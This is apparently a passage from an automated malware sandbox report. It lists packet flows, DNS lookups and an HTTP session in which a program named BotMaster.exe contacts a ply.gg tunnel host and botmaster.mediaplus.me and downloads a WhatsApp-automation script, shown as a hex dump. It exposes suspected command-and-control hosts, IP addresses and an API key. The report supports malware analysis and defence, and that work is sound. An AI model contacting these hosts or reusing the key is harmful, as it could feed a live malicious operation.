                                                                                                                                                                                                                Mar 10, 2024 17:46:23.798194885 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.798573971 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.798629045 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.798996925 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.799083948 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.799143076 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.799144983 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.799510002 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.799550056 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.799607038 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.800030947 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.800090075 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.800529957 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.800838947 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.800899029 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.800911903 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801003933 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801250935 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801312923 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801604986 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801772118 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801810026 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801826000 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.801856995 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.802128077 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.802371025 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.802426100 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.802474022 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.802782059 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.802834988 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.803260088 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.803298950 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.803503990 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.803558111 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.804192066 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.804372072 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.804428101 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.804599047 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.804657936 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.805098057 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.805139065 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.805190086 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.805197954 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.806051016 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.806090117 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.806128979 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.806292057 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:23.806355000 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.139949083 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.140017033 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.140057087 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.140077114 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.140827894 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.140896082 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.140929937 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144103050 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144238949 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144377947 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144598961 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144646883 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144757986 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144943953 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144983053 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.144992113 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.145023108 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.145081997 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.145308971 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.213255882 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.489264965 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.489326000 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.489365101 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.489495039 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.489888906 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490076065 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490192890 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490356922 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490461111 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490526915 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490725040 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490763903 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490778923 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490804911 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490844965 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490886927 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490889072 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.490935087 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.491271973 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.491586924 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.491641045 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.491782904 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.493654966 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.493694067 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.493726969 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.494066954 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.494888067 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.494925022 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.494952917 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.494961023 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.494996071 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495033026 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495131969 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495138884 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495177984 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495227098 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495376110 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495465040 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495501995 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495517015 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.495950937 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496009111 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496073008 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496110916 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496149063 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496159077 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496246099 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496293068 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496314049 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496330976 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496387005 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496433020 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496469975 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496520996 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.496540070 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.497044086 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.497081041 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.497097969 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.498583078 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.498667955 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.835247993 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.835311890 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.835516930 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.835855961 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.835921049 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.835962057 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.836019039 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.836057901 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.836260080 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.836260080 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.836647034 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.836854935 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837064981 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837177992 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837236881 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837500095 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837619066 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837755919 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.837784052 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:24.891015053 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.235106945 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.241355896 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.241503954 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.241564035 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.242564917 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.242615938 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.243108034 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.243148088 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.243206024 CET4973415762192.168.2.4209.25.140.212
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.243668079 CET1576249734209.25.140.212192.168.2.4
                                                                                                                                                                                                                Mar 10, 2024 17:46:25.243737936 CET1576249734209.25.140.212192.168.2.4

                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Mar 10, 2024 17:45:45.733042955 CET192.168.2.41.1.1.10x9389Standard query (0)title-formula.at.ply.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.172915936 CET192.168.2.41.1.1.10xcdd8Standard query (0)botmaster.mediaplus.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.431046963 CET192.168.2.41.1.1.10xa893Standard query (0)www.whatsapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.432265043 CET192.168.2.41.1.1.10xa6f7Standard query (0)www.whatsapp.com65IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.444653988 CET192.168.2.41.1.1.10x8b25Standard query (0)www.whatsapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.478504896 CET192.168.2.41.1.1.10x5aa7Standard query (0)web.whatsapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.479554892 CET192.168.2.41.1.1.10xecd6Standard query (0)web.whatsapp.com65IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.500754118 CET192.168.2.41.1.1.10x3ecfStandard query (0)web.whatsapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.360424042 CET192.168.2.41.1.1.10x36d7Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.361370087 CET192.168.2.41.1.1.10xfa6cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.362741947 CET192.168.2.41.1.1.10x3d37Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.363336086 CET192.168.2.41.1.1.10xdb34Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.723567009 CET192.168.2.41.1.1.10x4943Standard query (0)static.whatsapp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.724251032 CET192.168.2.41.1.1.10x2cf8Standard query (0)static.whatsapp.net65IN (0x0001)false

                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Mar 10, 2024 17:45:45.903764009 CET1.1.1.1192.168.2.40x9389No error (0)title-formula.at.ply.gg209.25.140.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.410885096 CET1.1.1.1192.168.2.40xcdd8No error (0)botmaster.mediaplus.me173.248.130.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.587744951 CET1.1.1.1192.168.2.40xa6f7No error (0)www.whatsapp.commmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.605803013 CET1.1.1.1192.168.2.40xa893No error (0)www.whatsapp.commmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.605803013 CET1.1.1.1192.168.2.40xa893No error (0)mmx-ds.cdn.whatsapp.net31.13.65.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.605951071 CET1.1.1.1192.168.2.40x8b25No error (0)www.whatsapp.commmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.605951071 CET1.1.1.1192.168.2.40x8b25No error (0)mmx-ds.cdn.whatsapp.net31.13.65.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.633161068 CET1.1.1.1192.168.2.40x5aa7No error (0)web.whatsapp.commmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.633161068 CET1.1.1.1192.168.2.40x5aa7No error (0)mmx-ds.cdn.whatsapp.net31.13.65.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.634423971 CET1.1.1.1192.168.2.40xecd6No error (0)web.whatsapp.commmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.655436993 CET1.1.1.1192.168.2.40x3ecfNo error (0)web.whatsapp.commmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:05.655436993 CET1.1.1.1192.168.2.40x3ecfNo error (0)mmx-ds.cdn.whatsapp.net31.13.65.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.516349077 CET1.1.1.1192.168.2.40x36d7No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.516349077 CET1.1.1.1192.168.2.40x36d7No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.516985893 CET1.1.1.1192.168.2.40xfa6cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.518596888 CET1.1.1.1192.168.2.40x3d37No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.518596888 CET1.1.1.1192.168.2.40x3d37No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.519284010 CET1.1.1.1192.168.2.40xdb34No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.878202915 CET1.1.1.1192.168.2.40x4943No error (0)static.whatsapp.netmmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.878202915 CET1.1.1.1192.168.2.40x4943No error (0)mmx-ds.cdn.whatsapp.net31.13.65.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:46:08.879115105 CET1.1.1.1192.168.2.40x2cf8No error (0)static.whatsapp.netmmx-ds.cdn.whatsapp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:47:04.865747929 CET1.1.1.1192.168.2.40x609eNo error (0)msftstore.s.llnwi.net68.142.107.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:47:05.859545946 CET1.1.1.1192.168.2.40x609eNo error (0)msftstore.s.llnwi.net68.142.107.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:47:06.874075890 CET1.1.1.1192.168.2.40x609eNo error (0)msftstore.s.llnwi.net68.142.107.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:47:08.876034975 CET1.1.1.1192.168.2.40x609eNo error (0)msftstore.s.llnwi.net68.142.107.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Mar 10, 2024 17:47:12.879347086 CET1.1.1.1192.168.2.40x609eNo error (0)msftstore.s.llnwi.net68.142.107.4A (IP address)IN (0x0001)false

                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.449738173.248.130.117806256C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.616259098 CET133OUTGET /api/v2/getwapi.ashx?key=Ju9SWyJu9WQwgnmtZo7m2meGaJg8ciMVZGByC HTTP/1.1
                                                                                                                                                                                                                Host: botmaster.mediaplus.me
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.804245949 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:45:57 GMT
                                                                                                                                                                                                                Content-Length: 474879
                                                                                                                                                                                                                Data Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 77 70 70 63 6f 6e 6e 65 63 74 2d 77 61 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 57 50 50 3d 74 28 29 3a 65 2e 57 50 50 3d 74 28 29 7d 28 73 65 6c 66 2c 28 28 29 3d 3e 28 28 29 3d 3e 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 37 39 37 34 32 3a 28 65 2c 74 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 62 79 74 65 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 61 28 65 29 2c 72 3d 74 5b 30 5d 2c 6e 3d 74 5b 31 5d 3b 72 65 74 75 72 6e 20 33 2a 28 72 2b 6e 29 2f 34 2d 6e 7d 2c 74 2e 74 6f 42 79 74 65 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 69 3d 61 28 65 29 2c 73 3d 69 5b 30 5d 2c 75 3d 69 5b 31 5d 2c 63 3d 6e 65 77 20 6f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 33 2a 28 74 2b 72 29 2f 34 2d 72 7d 28 30 2c 73 2c 75 29 29 2c 6c 3d 30 2c 64 3d 75 3e 30 3f 73 2d 34 3a 73 3b 66 6f 72 28 72 3d 30 3b 72 3c 64 3b 72 2b 3d 34 29 74 3d 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 5d 3c 3c 31 38 7c 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 31 29 5d 3c 3c 31 32 7c 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 32 29 5d 3c 3c 36 7c 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 33 29 5d 2c 63 5b 6c 2b 2b 5d 3d 74 3e 3e 31 36 26 32 35 35 2c 63 5b 6c 2b 2b 5d 3d 74 3e 3e 38 26 32 35 35 2c 63 5b 6c 2b 2b 5d 3d 32 35 35 26 74 3b 72 65 74 75 72 6e 20 32 3d 3d 3d 75 26 26 28 74 3d 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 5d 3c 3c 32 7c 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 31 29 5d 3e 3e 34 2c 63 5b 6c 2b 2b 5d 3d 32 35 35 26 74 29 2c 31 3d 3d 3d 75 26 26 28 74 3d 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 5d 3c 3c 31 30 7c 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 31 29 5d 3c 3c 34 7c 6e 5b 65 2e 63 68 61 72 43 6f 64 65 41 